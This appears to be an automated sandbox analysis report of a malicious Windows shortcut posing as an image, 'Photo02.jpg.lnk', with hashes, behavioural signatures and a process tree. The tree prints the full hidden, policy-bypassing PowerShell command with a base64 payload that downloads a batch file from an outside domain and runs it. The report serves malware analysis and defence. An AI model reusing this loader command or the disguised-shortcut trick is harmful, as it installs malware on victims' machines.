Analysis
-
max time kernel
122s -
max time network
125s -
platform
windows7_x64 -
resource
win7-20231215-en -
resource tags
arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system -
submitted
31/01/2024, 08:13
Static task
static1
Behavioral task
behavioral1
Sample
Image012.png.lnk
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
Image012.png.lnk
Resource
win10v2004-20231222-en
Behavioral task
behavioral3
Sample
Photo01.jpg.lnk
Resource
win7-20231129-en
Behavioral task
behavioral4
Sample
Photo01.jpg.lnk
Resource
win10v2004-20231215-en
Behavioral task
behavioral5
Sample
Photo02.jpg.lnk
Resource
win7-20231215-en
Behavioral task
behavioral6
Sample
Photo02.jpg.lnk
Resource
win10v2004-20231215-en
General
-
Target
Photo02.jpg.lnk
-
Size
2KB
-
MD5
a9c696e8139ba0cfdf3241131fff2d1e
-
SHA1
0607510c26a987944ad5a7da23ebaa69a21e70ed
-
SHA256
fcb534128c207ff3e66cadc7e6400ce3987374d151aac8e7aa741aadd6a70a88
-
SHA512
b933fa80f6eb65be5bb05d8cb8e3ebfbe8c97cad970271d7674d33a72bc8426a20ce17be698f35fcc75592dd479bb80579ceee2454ee4af1c80c616b84cd57ad
Malware Config
Signatures
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 3012 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 3012 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 1240 wrote to memory of 2940 1240 cmd.exe 29 PID 1240 wrote to memory of 2940 1240 cmd.exe 29 PID 1240 wrote to memory of 2940 1240 cmd.exe 29 PID 2940 wrote to memory of 3012 2940 cmd.exe 30 PID 2940 wrote to memory of 3012 2940 cmd.exe 30 PID 2940 wrote to memory of 3012 2940 cmd.exe 30
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\Photo02.jpg.lnk1⤵
- Suspicious use of WriteProcessMemory
PID:1240 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" CMd /C PoWERSHEll.Exe -ex BYPASS -nOP -W HidDen -eC IAAgAGkAbgBWAE8ASwBFAC0AdwBlAEIAcgBlAHEAVQBFAHMAdAAgAAkALQBVAHIASQAgAB0gaAB0AHQAcAA6AC8ALwB2AHkAYgBzAG4AZgAzAC4AcwBhAC4AYwBvAG0ALwBtAGUAZAAuAGIAYQB0AB0gIAAtAG8AdQB0AEYAaQBsAGUAIAAJAB0gJABFAE4AVgA6AHQAZQBtAHAAXABqAHIAYgBiAHMAZgByAC4AYgBhAHQAHSAgAAkAOwAgACAAaQBOAHYATwBLAEUALQBJAHQAZQBNACAACQAdICQAZQBOAFYAOgB0AGUATQBQAFwAagByAGIAYgBzAGYAcgAuAGIAYQB0AB0g2⤵
- Suspicious use of WriteProcessMemory
PID:2940 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePoWERSHEll.Exe -ex BYPASS -nOP -W HidDen -eC IAAgAGkAbgBWAE8ASwBFAC0AdwBlAEIAcgBlAHEAVQBFAHMAdAAgAAkALQBVAHIASQAgAB0gaAB0AHQAcAA6AC8ALwB2AHkAYgBzAG4AZgAzAC4AcwBhAC4AYwBvAG0ALwBtAGUAZAAuAGIAYQB0AB0gIAAtAG8AdQB0AEYAaQBsAGUAIAAJAB0gJABFAE4AVgA6AHQAZQBtAHAAXABqAHIAYgBiAHMAZgByAC4AYgBhAHQAHSAgAAkAOwAgACAAaQBOAHYATwBLAEUALQBJAHQAZQBNACAACQAdICQAZQBOAFYAOgB0AGUATQBQAFwAagByAGIAYgBzAGYAcgAuAGIAYQB0AB0g3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3012
-
-